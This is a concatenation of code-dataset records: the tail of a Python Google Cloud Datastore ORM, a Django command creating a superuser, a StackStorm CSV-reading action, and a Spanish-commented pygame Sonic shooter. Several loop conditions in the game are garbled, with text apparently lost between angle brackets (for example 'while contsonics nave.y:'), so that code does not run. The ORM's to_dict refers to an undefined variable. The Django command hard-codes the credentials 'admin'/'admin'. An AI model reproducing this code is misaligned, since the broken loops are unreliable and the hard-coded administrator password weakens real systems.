\"id\"\nMAX_ITEMS_PER_OPERATIONS = 500 # Datastore cannot write more than 500 items per call\n\n\ndef _chunks(lst, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i : i + n]\n\n\n@dataclass\nclass DoesNotExist(Exception):\n cls: Type[EmbeddedDocument]\n filters: Dict\n\n\n@dataclass\nclass MultipleObjectsFound(Exception):\n cls: Type[EmbeddedDocument]\n filters: Dict\n\n\ndef _starts_with_operator(lookup_fields, value) -> List[Tuple[str, str, Any]]:\n field_name = \".\".join(lookup_fields)\n return [\n (field_name, \">=\", value),\n (field_name, \"<=\", f\"{value}\\ufffd\"),\n ]\n\n\n@dataclass\nclass Manager:\n lookup_operators: ClassVar[Dict[str, Union[str, Callable]]] = {\n \"eq\": \"=\",\n \"gt\": \">\",\n \"gte\": \">=\",\n \"lt\": \"<\",\n \"lte\": \"<=\",\n \"in\": \"in\",\n \"startswith\": _starts_with_operator,\n }\n\n _client: ClassVar[datastore.Client] = None\n fields: Dict[str, type]\n pk_field: str\n doc_klass: Type[Document]\n kind: str\n\n def get_client(self) -> datastore.Client:\n if not self._client:\n self._client = datastore.Client(namespace=self.get_namespace())\n return self._client\n\n def get_namespace(self):\n return self.doc_klass.Meta.namespace\n\n def build_key(self, pk: Any = None) -> datastore.Key:\n if pk:\n typed_pk = self.doc_klass.Meta.fields[self.pk_field](pk)\n return self.get_client().key(self.kind, typed_pk)\n # If no primary key is provided, we let the server create a new ID\n return self.get_client().allocate_ids(self.get_client().key(self.kind), 1)[0]\n\n def _iterate(self, query, page_size):\n cursor = None\n empty = False\n\n while not empty:\n query_iter = query.fetch(start_cursor=cursor, limit=page_size)\n\n page = next(query_iter.pages, [])\n for item in page:\n yield item\n cursor = query_iter.next_page_token\n empty = not bool(cursor)\n\n def query(\n self,\n distinct_on: str = None,\n order_by: Union[str, List[str]] = None,\n page_size: int = None,\n **kwargs,\n ) -> datastore.query.Iterator:\n # base query\n query = self.get_client().query(kind=self.kind)\n if order_by:\n query.order = order_by\n if distinct_on:\n query.distinct_on = distinct_on\n\n # parse lookup args\n cross_filters = []\n for key, value in kwargs.items():\n all_filters = self._build_filter(key=key, value=value)\n for field_name, operator, field_value in all_filters:\n if operator == \"in\":\n cross_filters.append((field_name, operator, field_value))\n else:\n query.add_filter(field_name, operator, field_value)\n\n if not cross_filters:\n yield from self._iterate(query=query, page_size=page_size)\n else:\n # prepare combinations\n options = defaultdict(list)\n for name, operator, values in cross_filters:\n for value in values:\n options[name].append((name, \"=\", value))\n\n combinations = itertools.product(*list(options.values()))\n\n found = set()\n for combination in combinations:\n current_query = query\n for field_name, operator, value in combination:\n current_query = current_query.add_filter(field_name, operator, value)\n\n for item in self._iterate(query=current_query, page_size=page_size):\n if item.id not in found:\n yield item\n found.add(item.id)\n\n def filter(self, **kwargs) -> Generator[Document, None, None]:\n for entity in self.query(**kwargs):\n yield self.from_entity(entity=entity)\n\n def get(self, **kwargs) -> Document:\n if self.pk_field in kwargs:\n pk = kwargs[self.pk_field]\n entity = self.get_client().get(key=self.build_key(pk=pk))\n if entity:\n return self.from_entity(entity=entity)\n raise DoesNotExist(self.doc_klass, pk)\n\n # Since we can't fetch directly from the key,\n # we filter and hope for just one object\n one_obj = None\n for obj in self.filter(**kwargs):\n if one_obj is not None:\n raise MultipleObjectsFound(self.doc_klass, filters=kwargs)\n one_obj = obj\n if not one_obj:\n raise DoesNotExist(self.doc_klass, filters=kwargs)\n return one_obj\n\n def create(self, obj: Document) -> Document:\n entity = self.to_entity(obj=obj)\n self.get_client().put(entity=entity)\n\n # if successfully saved, we assure the auto-generated ID is added to the final object\n if not obj.pk:\n setattr(obj, obj.Meta.pk_field, entity.id)\n return obj\n\n def update(self, pk: str, **kwargs) -> Document:\n if kwargs:\n entity = self.get_client().get(key=self.build_key(pk=pk))\n # TODO: enable partial nested updates\n as_data = {\n key: value.Meta.to_dict(obj=value) if isinstance(value, EmbeddedDocument) else value\n for key, value in kwargs.items()\n }\n entity.update(as_data)\n self.get_client().put(entity=entity)\n return self.get(id=pk)\n\n def delete(self, pk: str = None):\n if pk:\n self.get_client().delete(key=self.build_key(pk=pk))\n else:\n keys = [entity.key for entity in self.query()]\n for chunk in _chunks(keys, MAX_ITEMS_PER_OPERATIONS):\n self.get_client().delete_multi(keys=chunk)\n\n def _build_filter(self, key: str, value: Any) -> List[Tuple[str, str, Any]]:\n operator = None\n\n field_name, *extra = key.split(\"__\")\n if extra:\n if len(extra) > 1:\n raise exceptions.UnsupportedFormatException(f\"Unsupported lookup key format {extra}\")\n operator = extra[0]\n if operator not in self.lookup_operators:\n raise exceptions.UnsupportedFormatException(f\"Unsupported lookup {operator}\")\n if callable(operator):\n return operator(field_name, value)\n\n parts = field_name.split(\".\")\n if len(parts) > 1 and parts[0] not in self.fields:\n raise exceptions.ValidationError(\n f\"{parts[0]} is not a valid field. Excepted one of {' | '.join(self.fields)}\"\n )\n\n return [(field_name, (operator or \"=\"), value)]\n\n def to_entity(self, obj: Document) -> datastore.Entity:\n entity = datastore.Entity(key=self.build_key(pk=obj.pk))\n if not obj.pk:\n setattr(obj, obj.Meta.pk_field, entity.id)\n entity.update(obj.Meta.to_dict(obj=obj))\n return entity\n\n def from_entity(self, entity: datastore.Entity) -> Document:\n data = dict(entity.items())\n if self.pk_field not in data:\n data[self.pk_field] = entity.id\n return self.doc_klass.Meta.from_dict(data=data)\n\n\n@dataclass\nclass Metadata:\n fields: Dict[str, type]\n doc_klass: Type[EmbeddedDocument]\n pk_field: str = None\n namespace: str = DEFAULT_NAMESPACE\n\n def from_dict(self, data: Dict) -> EmbeddedDocument:\n data = data.copy()\n\n def _build(klass: Union[EmbeddedDocument, Callable], value: Any):\n if value is None or klass == Any: # pylint: disable=comparison-with-callable\n return value\n\n if issubclass(klass, EmbeddedDocument):\n return klass.Meta.from_dict(data=value)\n\n if klass == datetime:\n return klass.fromisoformat(str(value))\n\n return klass(value)\n\n parsed_data = {}\n for field_name, field_klass in self.fields.items():\n try:\n raw_value = data[field_name]\n except KeyError:\n continue\n\n if getattr(field_klass, \"_name\", \"\") == \"List\":\n inner_klass = get_args(field_klass)[0] # TODO: test composite types\n item = [_build(klass=inner_klass, value=i) for i in raw_value]\n elif getattr(field_klass, \"_name\", \"\") == \"Dict\":\n inner_klass_key, inner_klass_value = get_args(field_klass)\n item = {\n _build(klass=inner_klass_key, value=k): _build(klass=inner_klass_value, value=v)\n for k, v in raw_value.items()\n }\n else:\n item = _build(klass=field_klass, value=raw_value)\n parsed_data[field_name] = item\n\n return self.doc_klass(**parsed_data)\n\n def to_dict(self, obj: EmbeddedDocument, select_fields: List[str] = None) -> dict:\n # TODO handle custom dynamic fields\n def _unbuild(value):\n if value is None:\n return value\n if isinstance(value, EmbeddedDocument):\n return value.Meta.to_dict(obj=value)\n if isinstance(value, Enum):\n return value.value\n return value\n\n data = {}\n for field_name, field_klass in self.fields.items():\n if select_fields and field not in select_fields:\n continue\n\n raw_value = getattr(obj, field_name)\n\n if getattr(field_klass, \"_name\", \"\") == \"List\":\n item = [_unbuild(value=i) for i in raw_value]\n elif getattr(field_klass, \"_name\", \"\") == \"Dict\":\n item = {_unbuild(value=k): _unbuild(value=v) for k, v in raw_value.items()}\n else:\n item = _unbuild(value=raw_value)\n\n data[field_name] = item\n\n return data\n\n\nclass ORM(type):\n def __new__(mcs, name, bases, attrs):\n is_abstract_model = mcs._is_abstract(name=name)\n is_concrete_model = mcs._is_concrete(bases=bases)\n\n if not is_abstract_model:\n # Since it was not explicitly provided, add id: str = None\n if not mcs._has_explicit_pk_field(attrs=attrs, bases=bases) and is_concrete_model:\n attrs[\"__annotations__\"][DEFAULT_PK_FIELD] = int\n attrs[DEFAULT_PK_FIELD] = None\n\n new_cls = super().__new__(mcs, name, bases, attrs)\n\n if is_abstract_model:\n return new_cls\n\n # Metadata initialization\n typed_fields = mcs._extract_fields(klass=new_cls)\n new_cls.Meta = Metadata(\n fields=typed_fields,\n doc_klass=new_cls,\n namespace=getattr(new_cls, \"__namespace__\", None),\n )\n\n # Manager initialization\n if is_concrete_model:\n new_cls.documents = Manager(\n fields=typed_fields,\n pk_field=DEFAULT_PK_FIELD,\n doc_klass=new_cls,\n kind=name,\n )\n\n new_cls.Meta.pk_field = DEFAULT_PK_FIELD\n\n return new_cls\n\n @classmethod\n def _is_abstract(mcs, name: str) -> bool:\n return name in [\"Document\", \"EmbeddedDocument\"]\n\n @classmethod\n def _is_concrete(mcs, bases: Tuple[type]) -> bool:\n return \"Document\" in [base.__name__ for base in bases]\n\n @classmethod\n def _has_explicit_pk_field(mcs, attrs: Dict, bases: Tuple[type]) -> bool:\n if DEFAULT_PK_FIELD in attrs.get(\"__annotations__\", []):\n return True\n\n for base in bases:\n if DEFAULT_PK_FIELD in get_type_hints(base):\n return True\n\n return False\n\n @classmethod\n def _extract_fields(mcs, klass: type) -> Dict[str, type]:\n def _ignore(var_type: str, k: type):\n is_private = var_type.startswith(\"_\")\n is_class_var = getattr(k, \"__origin__\", None) == ClassVar # pylint: disable=comparison-with-callable\n return is_private or is_class_var\n\n hints = get_type_hints(klass)\n typed_fields = {var_type: k for var_type, k in hints.items() if not _ignore(var_type, k)}\n return typed_fields\n\n\n@dataclass\nclass EmbeddedDocument(metaclass=ORM):\n Meta: ClassVar[Metadata]\n\n @classmethod\n def deserialize(cls, **kwargs) -> EmbeddedDocument:\n return cls.Meta.from_dict(data=kwargs)\n\n def serialize(self) -> Dict:\n return self.Meta.to_dict(obj=self)\n\n\n@dataclass\nclass Document(EmbeddedDocument):\n documents: ClassVar[Manager]\n\n @property\n def pk(self):\n return getattr(self, self.Meta.pk_field, None)\n\n def save(self) -> Document:\n return self.documents.create(obj=self)\n\n def delete(self) -> None:\n self.documents.delete(pk=self.id)\n\n\n__all__ = (\n \"DoesNotExist\",\n \"MultipleObjectsFound\",\n \"EmbeddedDocument\",\n \"Document\",\n)\n","sub_path":"gcp_pilot/datastore.py","file_name":"datastore.py","file_ext":"py","file_size_in_byte":13305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"449833692","text":"from django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError\n\nclass Command(BaseCommand):\n help = 'Create Initial User and Data'\n\n def handle(self, *args, **kwargs):\n try:\n admin = User.objects.create_superuser('admin', 'admin@admin.cc', 'admin')\n admin.profile.is_admin = True\n admin.save()\n self.stdout.write('Successfully created superuser.')\n except IntegrityError:\n self.stdout.write('Superuser exists already.')\n","sub_path":"survey/management/commands/initialize.py","file_name":"initialize.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"176850372","text":"#!/usr/bin/env python\n\nimport json\nimport csv\n\n# Needs to be run in a Stackstorm virtualenv\nfrom st2actions.runners.pythonrunner import Action\n\n\nclass ReadProjectsEmailFile(Action):\n\n def run(self, file_path, projects):\n\n projects_list = projects['projects']\n\n result = {}\n\n with open(file_path) as csv_file:\n reader = csv.DictReader(csv_file, delimiter=';')\n for row in reader:\n project = row['project']\n if project in projects_list:\n result[project] = row['email']\n\n if len(projects_list) == len(result.keys()):\n self.logger.info(\"Projects given and projects found in file did match...\")\n return True, result\n else:\n self.logger.error(\"Projects given and projects found in file did not match!\")\n return False, {}\n","sub_path":"actions/read_projects_email_file.py","file_name":"read_projects_email_file.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"525145341","text":"import random, pygame, sys\nimport threading\n\nfrom playsound import playsound\nfrom pygame.locals import *\nfrom multiprocessing import Process\n\n# Declaración de constantes y variables\nWHITE = (255, 255, 255)\n\n# Función principal del juego\n# Array de sonics que vienen volando haciendo la rueda\nsonics=[]\n# Array de sonics muertos en la animación de morir\nsonicsmuertos=[]\n#Array de disparos\ndisparos=[]\n\n#Define si la partida está activa o se ha acabado\npartida = True\n\n#Reproduce el sonido de pasarse el nivel\ndef fxnivelpasado():\n playsound('nivelpasado.wav', False)\n\n#Reproduce la música de marble zone\ndef musicasonicmarblednb():\n pygame.mixer.music.load('musicasonicmarblednb.mp3')\n\n pygame.mixer.music.play(0)\n\n#Reproduce la música del robotnik\ndef musicarobotnik1():\n pygame.mixer.music.load('robotnikmusic1.mp3')\n pygame.mixer.music.play(0)\n\n#Música del game over\ndef musicagameover():\n pygame.mixer.music.load('gameover.mp3')\n pygame.mixer.music.play(0)\n\n#Clase que se utiliza para devolver la puntuación, el número de vidas y si se ha pasado un nivel\nclass Status():\n def __init__(self):\n self.puntuacion = 0\n self.vidas = 5\n self.pasado = False\n\n#Clase disparo, almacena la posición del disparo y el rect\nclass DisparoA(pygame.sprite.Sprite):\n def __init__(self,x,y):\n pygame.sprite.Sprite.__init__(self)\n self.x = x\n self.y = y\n self.rect = pygame.Rect(self.x, self.y,3,3)\n def updateposition(self):\n self.rect = pygame.Rect(self.x,self.y,3,3)\n\n#Almacena un sonic en animación de morir, su posición y velocidad inicial hacia arriba\nclass Sonicmuerto(pygame.sprite.Sprite):\n def __init__(self,x,y):\n pygame.sprite.Sprite.__init__(self)\n self.x = x\n self.y = y\n self.velocidad = -10\n\n#Almacena un sonic que viene volando haciendo la rueda\n#Su posición, su punto de destino (donde estaba la nave al aparecer)\nclass Sonic(pygame.sprite.Sprite):\n def __init__(self,destx,desty,nivel):\n pygame.sprite.Sprite.__init__(self)\n #Posición X, la inicial es siempre 370 fuera de la pantalla por la derecha\n self.x = 370\n #Posición y se decide aleatoriamente al crear el sonic\n self.y = random.randrange(1,224)\n #Posición del recorte de la animación del sprite empieza en 0\n self.possonic = 0\n #Coordenada x de destino de la trayectoria\n self.destx = destx\n #Coordenada y de destino de la trayectoria\n self.desty = desty\n #Rectángulo de colisión 50x50\n self.rect = pygame.Rect(self.x,self.y,50,50)\n #En el nivel 2 también existe la componente velocidad que se decide aleatoriamente\n if nivel==2:\n self.velocidady = random.randrange(-10,10)\n self.velocidadx = random.randrange(-5,-1)\n #Actualiza el rectángulo de colisión\n def updateposition(self):\n self.rect = pygame.Rect(self.x,self.y,50,50)\n\n#Almacena un robotnik\nclass Robotnik(pygame.sprite.Sprite):\n def __init__(self):\n #posición x\n self.x = 500\n #posición y se decide aleatoriamente\n self.y = random.randrange(0,80)\n #velocidad hacia la izquierda\n self.velocidady = 100\n #Rectángulo de colisión de 50 x 50\n self.rect = pygame.Rect(self.x,self.y,50,50)\n #Velocidad horizontal\n self.velocidadx = 0\n #vida del robotnik\n self.vida = 64\n def updateposition(self):\n self.rect = pygame.Rect(self.x,self.y,50,50)\n\n#Almacena el sonic en el nivel de sonic\nclass Sonicuno(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n #posición anterior x\n self.xanterior=125\n #posición\n self.x = 125\n self.y = 148\n #velocidad\n self.velocidadx = 0\n self.velocidady = 0\n #si mira hacia la izquierda o hacia la derecha\n self.sentido = False\n #Frame del sonic actual mientras corre 0 si está parado\n self.estado = 0\n #Si el sonic está saltando\n self.saltando = False\n #Frame del salto\n self.estadosaltando = 0\n #Rectángulo de colisión 50x50\n self.rect = pygame.Rect(self.x,self.y,50,50)\n #Actualiza el rectángulo de colisión\n def updateposition(self):\n self.rect = pygame.Rect(self.x,self.y,50,50)\n #Mueve el sonic según la velocidad en un frame\n def mueve(self):\n self.x += self.velocidadx\n #Cambia el sentido del sonic\n def cambiasentido(self,sentido):\n self.sentido = sentido\n #Cambia el estado o frame al caminar\n def cambiaestado(self):\n if self.estado==6:\n self.estado = 1\n else:\n self.estado += 1\n #Cambia el estado al saltar o frames\n def cambiaestadosaltando(self):\n if self.estadosaltando == 4:\n self.estadosaltando = 0\n else:\n self.estadosaltando += 1\n #Pone el sonic parado\n def ponparado(self):\n self.estado = 0\n\n#Clase que almacena la nave\nclass Nave(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.x = 10\n self.y = 10\n self.posnave = 44\n self.rect = pygame.Rect(self.x,self.y,5,5)\n def updateposition(self):\n self.rect = pygame.Rect(self.x,self.y,5,5)\n\n#Borra un sonic\ndef borrasonic(pos):\n sonics.pop(pos)\n#Borra un sonic muerto al caer debajo\ndef borrasonicmuerto(pos):\n sonicsmuertos.pop(pos)\n#Borra un disparo\ndef borradisparo(pos):\n disparos.pop(pos)\n#Crea un sonic enemigo nuevo\ndef creasonic(personaje_x, personaje_y, nivel):\n sonics.append(Sonic(personaje_x,personaje_y, nivel))\n#Crea un disparo\ndef creadisparo(x,y):\n disparos.append(DisparoA(x,y))\n#Fin de la partida\ndef gameover(screen):\n clock = pygame.time.Clock()\n continua = False\n imagengameover = pygame.image.load('gameover.png').convert()\n musicagameover()\n cont=0\n while not continua:\n clock.tick(60)\n if cont<100:\n cont+=1\n screen.blit(imagengameover, (0, 0))\n\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit(0)\n if event.type == pygame.KEYDOWN:\n if cont==100:\n if event.key == pygame.K_SPACE:\n continua = True\n elif event.key == pygame.K_q:\n pygame.quit()\n sys.exit(0)\n pygame.display.update()\n\n#Muestra que el nivel está pasado\ndef muestrapasado(screen):\n clock = pygame.time.Clock()\n black = 0, 0, 0\n cont = 0\n screen.fill(black)\n font = pygame.font.Font(pygame.font.get_default_font(), 12)\n continua = False\n\n while not continua:\n clock.tick(60)\n textsurface = font.render('Congratulations Game Completed ', False, (255, 255, 255))\n screen.blit(textsurface,(70,70))\n textsurface = font.render('Developed by: Artur Viader Mataix ', False, (255, 255, 255))\n screen.blit(textsurface,(70,140))\n \n if cont<100:\n cont+=1\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit(0)\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n if cont==100:\n continua = True\n if event.key == pygame.K_q:\n pygame.quit()\n sys.exit(0)\n pygame.display.update()\n\n#Nivel de sonic\ndef fasesonic(screen,nivel,status):\n partida = True\n sonicimagen = pygame.image.load(\"sonic.gif\").convert()\n sonicimageni = pygame.transform.flip(sonicimagen,True,False)\n robotniki = pygame.image.load(\"robotnik.gif\").convert()\n imagenitems = pygame.image.load(\"items.gif\").convert()\n pressed_up = False\n pressed_down = False\n pressed_left = False\n pressed_right = False\n clock = pygame.time.Clock()\n fondo = pygame.image.load('fondo2.png').convert()\n posfondox = 2\n pygame.font.init()\n font = pygame.font.Font(pygame.font.get_default_font(), 10)\n robotniks=[]\n personaje = Sonicuno()\n contavariavelocidad = 0\n contapierdevelocidad = 0\n contcambiaestado = 0\n empiezarobotniks = False\n robotnikshechos = False\n frecuenciarobotniks = 100\n controbotniks = 10\n controbotniks = 0\n posbandera = 8000\n girandobandera = False\n recortebandera = 275\n contabandera = 1\n puntuacion = status.puntuacion\n vidas = status.vidas\n\n contaralentizabandera = 0\n personaje.updateposition()\n fxrobotnikimpacto = pygame.mixer.Sound('S1_AC.wav')\n fxsonicsalto = pygame.mixer.Sound(\"S1_A0.wav\")\n while partida:\n clock.tick(60)\n\n screen.blit(fondo, (posfondox, -4))\n if(posbandera<=320 or posbandera >=0):\n if girandobandera:\n if contaralentizabandera == 4:\n contaralentizabandera = 0\n recortebandera += 50 * contabandera\n contabandera+=1\n if contabandera == 16:\n partida = False\n else:\n contaralentizabandera += 1\n screen.blit(imagenitems, (posbandera, 148), (recortebandera, 29, 50, 50))\n\n if posbandera <= 160:\n girandobandera = True\n\n\n contarobotniks = 0\n while contarobotniks 0:\n contcambiaestado += 1\n if contcambiaestado >= 11 - (personaje.velocidadx):\n contcambiaestado =0\n personaje.cambiaestado()\n personaje.cambiasentido(False)\n elif personaje.velocidadx<0:\n contcambiaestado += 1\n if contcambiaestado >= 11 - (personaje.velocidadx * -1):\n contcambiaestado =0\n personaje.cambiaestado()\n personaje.cambiasentido(True)\n else:\n personaje.ponparado()\n\n if personaje.saltando:\n personaje.updateposition()\n screen.blit(sonicimagen, (personaje.x, personaje.y), (personaje.estadosaltando * 48, 144, 50, 50))\n\n personaje.cambiaestadosaltando()\n else:\n if personaje.sentido:\n if personaje.estado == 0:\n screen.blit(sonicimagen, (personaje.x, personaje.y), (284, 0, 50, 50))\n else:\n screen.blit(sonicimagen, (personaje.x, personaje.y), (48*personaje.estado, 0, 50, 50))\n else:\n if personaje.estado == 0:\n screen.blit(sonicimageni,(personaje.x, personaje.y), (188,0,50,50))\n else:\n screen.blit(sonicimageni, (personaje.x, personaje.y), (48*11 - 48*personaje.estado, 0, 50, 50))\n\n textsurface = font.render('Score ' + str(puntuacion), False, (0, 0, 255))\n screen.blit(textsurface,(0,0))\n textsurface = font.render('VIDAS ' + str(vidas), False, (0, 255, 255))\n screen.blit(textsurface,(275 ,200))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit(0)\n\n if event.type == pygame.KEYDOWN: # check for key presses\n if event.key == pygame.K_LEFT: # left arrow turns left\n pressed_left = True\n posanterior = personaje.x\n elif event.key == pygame.K_RIGHT: # right arrow turns right\n pressed_right = True\n posanterior = personaje.x\n elif event.key == pygame.K_UP: # up arrow goes up\n pressed_up = True\n elif event.key == pygame.K_DOWN: # down arrow goes down\n pressed_down = True\n elif event.key == pygame.K_SPACE:\n if not personaje.saltando:\n fxsonicsalto.play()\n personaje.saltando = True\n personaje.velocidady = -15\n personaje.possaltando = 0\n elif event.key == pygame.K_q:\n pygame.quit()\n sys.exit(0)\n elif event.type == pygame.KEYUP: # check for key releases\n if event.key == pygame.K_LEFT: # left arrow turns left\n contavariavelocidad = 0\n contapierdevelocidad = 0\n pressed_left = False\n elif event.key == pygame.K_RIGHT: # right arrow turns right\n contavariavelocidad = 0\n contapierdevelocidad = 0\n pressed_right = False\n elif event.key == pygame.K_UP: # up arrow goes up\n pressed_up = False\n elif event.key == pygame.K_DOWN: # down arrow goes down\n pressed_down = False\n #if pressed_up == True:\n\n #if pressed_down == True:\n if contavariavelocidad == 0:\n if pressed_right == True:\n if posbandera <0:\n personaje.ponparado()\n personaje.velocidadx = 0\n else:\n if personaje.velocidadx>=-12:\n personaje.velocidadx -= 1\n contavariavelocidad = 4\n if pressed_left == True:\n\n if posbandera >= 8200:\n personaje.ponparado()\n personaje.velocidadx = 0\n else:\n if personaje.velocidadx<=12:\n personaje.velocidadx += 1\n contavariavelocidad = 4\n else:\n contavariavelocidad -= 1\n\n if contapierdevelocidad == 0:\n if pressed_left == False and pressed_right == False:\n if personaje.velocidadx>0:\n personaje.velocidadx -=1\n elif personaje.velocidadx<0:\n personaje.velocidadx +=1\n contapierdevelocidad = 5\n else:\n contapierdevelocidad -= 1\n posbandera += personaje.velocidadx\n posfondox += personaje.velocidadx\n personaje.y += personaje.velocidady\n\n if posfondox<-3073:\n if not robotnikshechos:\n empiezarobotniks = True\n posfondox=0\n elif posfondox>0:\n if not robotnikshechos:\n empiezarobotniks = True\n posfondox=-3073;\n #personaje.mueve()\n personaje.xanterior = personaje.x\n\n personaje.updateposition()\n\n pygame.display.update()\n status.puntuacion = puntuacion\n status.pasado = True\n return status\n\n#Nivel normal\ndef fase(screen,nivel,status):\n partida = True\n sonics.clear()\n sonicsmuertos.clear()\n disparos.clear()\n naveimagen = pygame.image.load(\"nave.png\").convert()\n sonicimagen = pygame.image.load(\"sonic.gif\").convert()\n robotniki = pygame.image.load(\"robotnik.gif\").convert()\n robotnik = Robotnik()\n #Cambia el fondo según el nivel\n if nivel==1:\n fondo = pygame.image.load('fondo.jpeg').convert()\n elif nivel ==2:\n fondo = pygame.image.load('fondo2.png').convert()\n elif nivel == 4:\n fondo = pygame.image.load('fondov.jpg').convert()\n frecsonics = 35\n\n contsonics=0\n vidas = status.vidas\n puntuacion = status.puntuacion\n clock = pygame.time.Clock()\n pygame.font.init()\n font = pygame.font.Font(pygame.font.get_default_font(), 10)\n izquierdapulsado=0\n derechapulsado=0\n arribapulsado=0\n abajopulsado=0\n nave = Nave()\n\n # Bucle principal\n cont=0\n contasonic=0\n contcreasonic=0\n contmostrando = 0\n mostrandonave = False\n pressed_up = False\n pressed_down = False\n pressed_left = False\n pressed_right = False\n parpadeando = False\n contparpadeo = 0\n #música según el nivel\n if nivel == 1:\n musicasonicmarblednb()\n elif nivel == 4:\n musicarobotnik1()\n contcolisiones = 0\n maxcolisiones = 0\n pasado = False\n #Carga sonidos fx en memoria\n disparoa = pygame.mixer.Sound('disparoa.wav');\n sonicmuere = pygame.mixer.Sound('sonicmuere.wav');\n fxpierdevida = pygame.mixer.Sound('S1_A6.wav');\n fxmuere = pygame.mixer.Sound('S1_B9.wav')\n fxrobotnikimpacto = pygame.mixer.Sound('S1_AC.wav')\n maxfondo = 0\n if nivel == 1 or nivel == 2:\n maxfondo = -3320\n\n while partida:\n clock.tick(60)\n # 1.- Se dibuja la pantalla\n #screen.fill(WHITE)\n\n if nivel==1:\n screen.blit(fondo, (cont, 0))\n elif nivel ==2:\n screen.blit(fondo, (cont, -5))\n elif nivel ==4:\n screen.blit(fondo, (-nave.x * 1.2, -nave.y*1.2))\n\n\n screen.blit(robotniki, (robotnik.x, robotnik.y),(0,0,60,60))\n robotnik.velocidadx = (nave.x- robotnik.x) / 200\n robotnik.velocidady = (nave.y - robotnik.y) /200\n robotnik.x += robotnik.velocidadx\n robotnik.y += robotnik.velocidady\n\n robotnik.updateposition()\n if parpadeando == False:\n if pygame.sprite.collide_rect(robotnik,nave):\n vidas -= 1\n if vidas == 0:\n fxmuere.play()\n else:\n fxpierdevida.play()\n parpadeando = True\n contparpadeo = 90\n if vidas == 0:\n partida = False\n\n if parpadeando:\n if contparpadeo == 0:\n parpadeando = False\n else:\n contparpadeo -= 1\n if mostrandonave:\n screen.blit(naveimagen, (nave.x, nave.y),(0,nave.posnave,35,22))\n if contmostrando == 4:\n contmostrando = 0\n if mostrandonave:\n mostrandonave = False\n else:\n mostrandonave = True\n else:\n contmostrando += 1\n else:\n screen.blit(naveimagen, (nave.x, nave.y),(0,nave.posnave,35,22))\n\n contsonics=0\n while contsonics nave.y:\n sonics[contsonics].y -=1\n elif sonics[contsonics].y < nave.y:\n sonics[contsonics].y +=1\n\n elif nivel == 2:\n sonics[contsonics].y += sonics[contsonics].velocidady\n if sonics[contsonics].y<0 or sonics[contsonics].y>224:\n sonics[contsonics].velocidady = sonics[contsonics].velocidady * -1\n if sonics[contsonics].velocidady > 0:\n sonics[contsonics].velocidady += 1\n else:\n sonics[contsonics].velocidady -= 1\n sonics[contsonics].x += sonics[contsonics].velocidadx\n posactual = sonics[contsonics].possonic\n if contasonic == 2:\n if posactual < int(148):\n sonics[contsonics].possonic = sonics[contsonics].possonic + 50\n else:\n sonics[contsonics].possonic = 0\n\n sonics[contsonics].updateposition()\n\n if parpadeando == False:\n if pygame.sprite.collide_rect(sonics[contsonics],nave):\n\n vidas -= 1\n if vidas == 0:\n fxmuere.play()\n else:\n fxpierdevida.play()\n parpadeando = True\n contparpadeo = 90\n if vidas == 0:\n partida = False\n sal = False\n encontrado = False\n contdisparos = 0\n while sal==False:\n if contdisparos224:\n borrasonicmuerto(contsonicsmuertos)\n else:\n sonicsmuertos[contsonicsmuertos].y += sonicsmuertos[contsonicsmuertos].velocidad\n sonicsmuertos[contsonicsmuertos].velocidad += 1\n screen.blit(sonicimagen, (sonicsmuertos[contsonicsmuertos].x, sonicsmuertos[contsonicsmuertos].y), (240, 145, 50, 50))\n contsonicsmuertos += 1\n\n\n\n\n if cont 0:\n nave.y -=1\n nave.updateposition()\n nave.posnave = 22\n\n if pressed_down == True:\n\n if nave.y<202:\n nave.y +=1\n nave.updateposition()\n nave.posnave = 0\n if pressed_left == True:\n if nave.x>0:\n nave.x -= 1\n nave.updateposition()\n if pressed_right == True:\n if nave.x<285:\n nave.x +=1\n nave.updateposition()\n if pressed_up == False and pressed_down == False:\n nave.posnave = 44\n\n if contcreasonic == frecsonics:\n creasonic(nave.x, nave.y, nivel)\n contcreasonic =0\n else:\n if contcreasonic > 500:\n partida = False\n pasado = True\n fxnivelpasado()\n contcreasonic +=1\n if contasonic == 2:\n contasonic = 0\n else:\n contasonic +=1\n\n\n # 3.- Se actualiza la pantalla\n pygame.display.update()\n status.vidas = vidas\n status.puntuacion = puntuacion\n status.pasado = pasado\n return status\ndef muestranivel(screen,nivel):\n clock = pygame.time.Clock()\n black = 0, 0, 0\n cont = 0\n screen.fill(black)\n font = pygame.font.Font(pygame.font.get_default_font(), 24)\n\n while cont<120:\n clock.tick(60)\n textsurface = font.render('Level ' + str(nivel), False, (255, 255, 255))\n screen.blit(textsurface,(70,70))\n pygame.display.update()\n cont += 1\n\ndef main():\n # Se inicializa el juego\n\n pygame.init()\n pygame.display.set_caption(\"Título del juego\")\n nivel = 1\n flags = FULLSCREEN | DOUBLEBUF\n #flags = DOUBLEBUF\n screen = pygame.display.set_mode((320,224),flags,8)\n screen.set_alpha(None)\n status = Status()\n #intro(screen)\n while True:\n muestranivel(screen,nivel)\n if nivel!=3:\n status = fase(screen, nivel, status)\n else:\n status = fasesonic(screen, nivel, status)\n if status.pasado:\n nivel += 1\n if nivel > 4:\n muestrapasado(screen)\n status.vidas = 5\n status.puntuacion = 0\n nivel = 1\n else:\n gameover(screen)\n status.vidas = 5\n status.puntuacion = 0\n nivel = 1\n\n\n# Este fichero es el que ejecuta el juego principal\nif __name__ == '__main__':\n 